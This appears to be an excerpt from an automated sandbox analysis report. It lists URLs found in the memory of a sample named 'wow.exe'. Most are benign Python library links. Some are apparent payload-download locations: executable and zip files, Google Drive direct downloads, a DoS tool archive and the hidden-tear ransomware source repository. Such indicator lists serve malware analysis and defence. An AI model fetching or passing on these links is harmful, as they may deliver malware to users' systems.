                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2241882672.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.reifenquick.de/Scripts/hl8-8w4cs-6325/
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2241882672.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.reifenquick.de/Scripts/open-0627720493640-azQ24PfFjRm/guarded-space/gxkx9t42ra6yf-6x7uyx3
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2241882672.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.reifenquick.de/Scripts/statement/ul397wfyb/
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.starcountry.net/screenmate/cute/sm1302.zip
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.teknoarge.com/update/ana/Update.exe
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ysbaojia.com/downfile.asp?sid=276663/
                            Source: wow.exe, 00000009.00000003.2214169440.000001D428A81000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2216184101.000001D428211000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2214260588.000001D428AD3000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2213869811.000001D428211000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2213804376.000001D428B51000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3070849035.000001D4281EC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2919261776.000001D4281EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wwwsearch.sf.net/):
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2241882672.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://yzkzixun.com/v2x2vexx.jpg
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2241882672.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://abissnet.net/u0eukz.zip
                            Source: wow.exe, 00000000.00000003.2188108431.0000028D65E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.jaraco.com/skeleton
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2241882672.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://buscascolegios.diit.cl/txs9e9.zip
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codeload.github.com/MeteorAdminz/hidden-tear/zip/master
                            Source: wow.exe, 00000000.00000003.2166979639.0000028D65E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io
                            Source: wow.exe, 00000000.00000003.2166979639.0000028D65E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/
                            Source: wow.exe, 00000000.00000003.2166979639.0000028D65E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/en/latest/changelog/
                            Source: wow.exe, 00000000.00000003.2166979639.0000028D65E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/en/latest/installation/
                            Source: wow.exe, 00000000.00000003.2166979639.0000028D65E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/en/latest/security/
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2241882672.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dl.packetstormsecurity.net/DoS/nemesy13.zip
                            Source: wow.exe, 00000000.00000003.2164303165.0000028D65E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.github.com/en/account-and-profile/setting-up-and-managing-your-github-profile/customizi
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?export=download&id=1CtmYWLj5woUiug1WgIZy3kE7YJ1u0YoR&revid=0B_t0-zked1mGa
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?export=download&id=1GV_Nk9lLqw4fxUdO-khJA7NUUJ1KEvvw&revid=0B7ZeFP-G6n7vM
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?export=download&id=1H_DyP_d5Lst4Akyf2QEzXL7J1SCVbtVs&revid=0B5thCKui5i0md
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2241882672.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?export=download&id=1JPL-UoUydm5HypQM67uokyDdrbLbpxvW&revid=0B7zpIPRmOC5Ub
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?export=download&id=1M8jsZvQ-zTFruL7VgSB6q-n3fTGnkbdJ&revid=0BxrhyBF9__wNM
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?export=download&id=1SbD1rnw8lUztJMSH6GDlZUPVyUPBopa0&revid=0B3yyJTs_WOKLR
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?export=download&id=1YGn4gkmy9mUSDp_LgNPyJjh6RSKT39vP&revid=0B8rbGP2BpEOfM
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?export=download&id=1tiLqoZOt07VyLvDmmSfS7iA452jWhKTj&revid=0B7gsMQZks4Xkc
                            Source: wow.exe, 00000009.00000003.2206467033.000001D427ADF000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3106295134.000001D427B5F000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3070415917.000001D427ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
                            Source: wow.exe, 00000000.00000003.2188108431.0000028D65E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.metadata.html
                            Source: wow.exe, 00000000.00000003.2188108431.0000028D65E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/reference/import.html#finders-and-loaders
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=12Ma_YvBmprTs6E_VkFNMWIkRNWSARQbW
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1ETPmpb2shvUny5DxJ5awfpxklxqpBzGx
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1GVnZexVVs3VPv0-ihFlWnmzMHIJ3qqlY
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1N8_s6gIjereArczwh74BlKYgOdIg64eO
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1NW1GmZG6LwTuhs0TTE969xcFpP9_dc5q
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1O9jG3OQYEWNcoPTigwsCdbTfMvtfQyGJ
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1YfqTuGAHQHQrUlWUGDEkEAvfFktSL8cI
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1alQ8r5TnR6wWIfTqA3l6D9FYMv7y0G9m
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1b6t1MjNJCvnDcY-MDQQ0NeqRBOcqYJu4
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1uYGnPwZZyzn2rODSRImg0-SlOxy_leTG
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1z7QhwCOzJWeHKsdhw-YUiVac2JzwjQiA
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?id=1a7jWDzayVXW_d3CgV_N7TjF4STY3UFOr&export=download
                            Source: wow.exe, 00000000.00000003.2164303165.0000028D65E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://filepreviews.io/
                            Source: wow.exe, 00000000.00000003.2188108431.0000028D65E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/astral-sh/ruff
                            Source: wow.exe, 00000009.00000003.2206467033.000001D427ADF000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2203869935.000001D427BE6000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3106295134.000001D427B5F000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3070415917.000001D427ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/jaraco/jaraco.functools/issues/5
                            Source: wow.exe, 00000000.00000003.2189884988.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2190025964.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2187079346.0000028D65E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/mhammond/pywin32
                            Source: wow.exe, 00000000.00000003.2166979639.0000028D65E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography
                            Source: wow.exe, 00000000.00000003.2166979639.0000028D65E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/
                            Source: wow.exe, 00000000.00000003.2166979639.0000028D65E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/actions?query=workflow%3ACI
                            Source: wow.exe, 00000000.00000003.2166979639.0000028D65E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/issues
                            Source: wow.exe, 00000000.00000003.2166979639.0000028D65E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/workflows/CI/badge.svg?branch=main
                            Source: wow.exe, 00000000.00000003.2189433630.0000028D65E18000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2189433630.0000028D65E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/.github/blob/main/CODE_OF_CONDUCT.md
                            Source: wow.exe, 00000000.00000003.2189433630.0000028D65E18000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2189433630.0000028D65E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/wheel
                            Source: wow.exe, 00000000.00000003.2189433630.0000028D65E18000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2189433630.0000028D65E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/wheel/issues
                            Source: wow.exe, 00000000.00000003.2184321491.0000028D65E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyreadline/pyreadline).
                            Source: wow.exe, 00000000.00000003.2184321491.0000028D65E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyreadline3/pyreadline3
                            Source: wow.exe, 00000000.00000003.2184321491.0000028D65E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyreadline3/pyreadline3)
                            Source: wow.exe, 00000000.00000003.2184321491.0000028D65E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyreadline3/pyreadline3.git
                            Source: wow.exe, 00000000.00000003.2184321491.0000028D65E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyreadline3/pyreadline3/blob/master/doc/ChangeLog
                            Source: wow.exe, 00000000.00000003.2184321491.0000028D65E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyreadline3/pyreadline3/issues
                            Source: wow.exe, 00000000.00000003.2184321491.0000028D65E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyreadline3/pyreadline3/workflows/Publish/badge.svg)
                            Source: wow.exe, 00000000.00000003.2184321491.0000028D65E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyreadline3/pyreadline3/workflows/Test/badge.svg)
                            Source: wow.exe, 00000000.00000003.2164303165.0000028D65E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs
                            Source: wow.exe, 00000000.00000003.2164303165.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2164303165.0000028D65E21000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2164429508.0000028D65E21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs)
                            Source: wow.exe, 00000000.00000003.2164303165.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2164303165.0000028D65E21000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2164429508.0000028D65E21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/blob/main/.github/CONTRIBUTING.md)
                            Source: wow.exe, 00000000.00000003.2164303165.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2164303165.0000028D65E21000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2164429508.0000028D65E21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/1328)
                            Source: wow.exe, 00000000.00000003.2164303165.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2164303165.0000028D65E21000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2164429508.0000028D65E21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/1329)
                            Source: wow.exe, 00000000.00000003.2164303165.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2164303165.0000028D65E21000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2164429508.0000028D65E21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/1330)
                            Source: wow.exe, 00000000.00000003.2164303165.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2164303165.0000028D65E21000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2164429508.0000028D65E21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/wiki/Extensions-to-attrs)
                            Source: wow.exe, 00000000.00000003.2188108431.0000028D65E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata
                            Source: wow.exe, 00000000.00000003.2188108431.0000028D65E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata/actions/workflows/main.yml/badge.svg
                            Source: wow.exe, 00000000.00000003.2188108431.0000028D65E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata/actions?query=workflow%3A%22tests%22
